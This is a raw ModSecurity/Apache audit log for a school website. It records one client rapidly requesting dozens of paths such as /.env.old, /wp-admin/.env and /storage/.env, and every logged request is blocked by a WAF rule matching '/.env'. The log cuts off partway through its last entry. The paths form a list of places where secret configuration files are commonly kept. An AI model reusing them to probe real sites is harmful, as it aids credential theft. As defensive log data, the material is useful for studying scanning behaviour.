+0700] aATno1Tf0pL9EQC7JDUZ4gAAAFY 103.236.140.4 38448 103.236.140.4 8181 --5f923d08-B-- GET /.env_1 HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --5f923d08-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f923d08-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907184353 651 (- - -) Stopwatch2: 1745151907184353 651; combined=247, p1=214, p2=0, p3=0, p4=0, p5=32, sr=65, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f923d08-Z-- --47d2ab52-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ4wAAAEA 103.236.140.4 38450 103.236.140.4 8181 --47d2ab52-B-- GET /admin-app/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --47d2ab52-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --47d2ab52-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907255287 651 (- - -) Stopwatch2: 1745151907255287 651; combined=247, p1=217, p2=0, p3=0, p4=0, p5=30, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47d2ab52-Z-- --5c8e8c6e-A-- [20/Apr/2025:19:25:07 +0700] aATno0AzeWrUIk0gvAsr7gAAANU 103.236.140.4 38452 103.236.140.4 8181 --5c8e8c6e-B-- GET /docs/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --5c8e8c6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5c8e8c6e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907325460 681 (- - -) Stopwatch2: 1745151907325460 681; combined=252, p1=215, p2=0, p3=0, p4=0, p5=37, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5c8e8c6e-Z-- --c9d55b05-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ5AAAAFg 103.236.140.4 38454 103.236.140.4 8181 --c9d55b05-B-- GET /.env_sample HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --c9d55b05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9d55b05-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907395843 707 (- - -) Stopwatch2: 1745151907395843 707; combined=248, p1=215, p2=0, p3=0, p4=0, p5=33, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9d55b05-Z-- --e659ec3f-A-- [20/Apr/2025:19:25:07 +0700] aATno1Tf0pL9EQC7JDUZ5QAAAFQ 103.236.140.4 38456 103.236.140.4 8181 --e659ec3f-B-- GET /.env.backup/.env.dev HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --e659ec3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e659ec3f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907467234 670 (- - -) Stopwatch2: 1745151907467234 670; combined=249, p1=217, p2=0, p3=0, p4=0, p5=32, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e659ec3f-Z-- --55e02b39-A-- [20/Apr/2025:19:25:07 +0700] aATno1u16wJWB6g0mU8NsgAAABM 103.236.140.4 38464 103.236.140.4 8181 --55e02b39-B-- GET /client/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --55e02b39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --55e02b39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907853336 793 (- - -) Stopwatch2: 1745151907853336 793; combined=329, p1=296, p2=0, p3=0, p4=0, p5=33, sr=125, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --55e02b39-Z-- --8b948670-A-- [20/Apr/2025:19:25:07 +0700] aATno1u16wJWB6g0mU8NswAAAAI 103.236.140.4 38466 103.236.140.4 8181 --8b948670-B-- GET /private/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8b948670-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b948670-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151907929782 743 (- - -) Stopwatch2: 1745151907929782 743; combined=254, p1=216, p2=0, p3=0, p4=0, p5=38, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b948670-Z-- --f6e6d06b-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6AAAAEg 103.236.140.4 38470 103.236.140.4 8181 --f6e6d06b-B-- GET /media/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --f6e6d06b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6e6d06b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908297252 719 (- - -) Stopwatch2: 1745151908297252 719; combined=298, p1=267, p2=0, p3=0, p4=0, p5=31, sr=110, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6e6d06b-Z-- --3d01e64e-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6QAAAE4 103.236.140.4 38472 103.236.140.4 8181 --3d01e64e-B-- GET /.env.old HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --3d01e64e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3d01e64e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908367069 688 (- - -) Stopwatch2: 1745151908367069 688; combined=284, p1=252, p2=0, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d01e64e-Z-- --031b0047-A-- [20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtQAAABI 103.236.140.4 38474 103.236.140.4 8181 --031b0047-B-- GET /enviroments/.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --031b0047-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --031b0047-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908437372 707 (- - -) Stopwatch2: 1745151908437372 707; combined=257, p1=219, p2=0, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --031b0047-Z-- --66337f3e-A-- [20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtgAAAA4 103.236.140.4 38476 103.236.140.4 8181 --66337f3e-B-- GET /development/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --66337f3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --66337f3e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908507388 13223 (- - -) Stopwatch2: 1745151908507388 13223; combined=25325, p1=218, p2=0, p3=0, p4=0, p5=12572, sr=67, sw=0, l=0, gc=12535 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --66337f3e-Z-- --44797d0a-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6gAAAE0 103.236.140.4 38478 103.236.140.4 8181 --44797d0a-B-- GET /.docker/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --44797d0a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44797d0a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908577632 722 (- - -) Stopwatch2: 1745151908577632 722; combined=295, p1=264, p2=0, p3=0, p4=0, p5=30, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44797d0a-Z-- --45561f3b-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ6wAAAEc 103.236.140.4 38480 103.236.140.4 8181 --45561f3b-B-- GET /wp-admin/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --45561f3b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --45561f3b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908717195 718 (- - -) Stopwatch2: 1745151908717195 718; combined=281, p1=244, p2=0, p3=0, p4=0, p5=37, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --45561f3b-Z-- --81173a73-A-- [20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NtwAAAAc 103.236.140.4 38482 103.236.140.4 8181 --81173a73-B-- GET /project/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --81173a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81173a73-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908787274 715 (- - -) Stopwatch2: 1745151908787274 715; combined=260, p1=221, p2=0, p3=0, p4=0, p5=39, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --81173a73-Z-- --a06ea722-A-- [20/Apr/2025:19:25:08 +0700] aATnpFu16wJWB6g0mU8NuQAAAAA 103.236.140.4 38488 103.236.140.4 8181 --a06ea722-B-- GET /wp-includes/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --a06ea722-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a06ea722-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908857467 640 (- - -) Stopwatch2: 1745151908857467 640; combined=247, p1=219, p2=0, p3=0, p4=0, p5=27, sr=63, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a06ea722-Z-- --0a504721-A-- [20/Apr/2025:19:25:08 +0700] aATnpFTf0pL9EQC7JDUZ7AAAAEk 103.236.140.4 38490 103.236.140.4 8181 --0a504721-B-- GET /wp-content/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --0a504721-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0a504721-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908927383 660 (- - -) Stopwatch2: 1745151908927383 660; combined=249, p1=222, p2=0, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0a504721-Z-- --8c734c6d-A-- [20/Apr/2025:19:25:08 +0700] aATnpMTCDeBrh52UaHS-UQAAAII 103.236.140.4 38492 103.236.140.4 8181 --8c734c6d-B-- GET /storage/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --8c734c6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8c734c6d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151908998178 756 (- - -) Stopwatch2: 1745151908998178 756; combined=309, p1=262, p2=0, p3=0, p4=0, p5=47, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8c734c6d-Z-- --042bf335-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7QAAAEs 103.236.140.4 38494 103.236.140.4 8181 --042bf335-B-- GET /shop/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --042bf335-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --042bf335-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909068108 719 (- - -) Stopwatch2: 1745151909068108 719; combined=291, p1=255, p2=0, p3=0, p4=0, p5=36, sr=99, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --042bf335-Z-- --1a1d6e7b-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7gAAAFc 103.236.140.4 38496 103.236.140.4 8181 --1a1d6e7b-B-- GET /log/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --1a1d6e7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1a1d6e7b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745151909138193 770 (- - -) Stopwatch2: 1745151909138193 770; combined=325, p1=288, p2=0, p3=0, p4=0, p5=37, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1a1d6e7b-Z-- --d9667364-A-- [20/Apr/2025:19:25:09 +0700] aATnpVTf0pL9EQC7JDUZ7wAAAEE 103.236.140.4 38498 103.236.140.4 8181 --d9667364-B-- GET /index/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 159.89.175.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 159.89.175.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* --d9667364-F-- 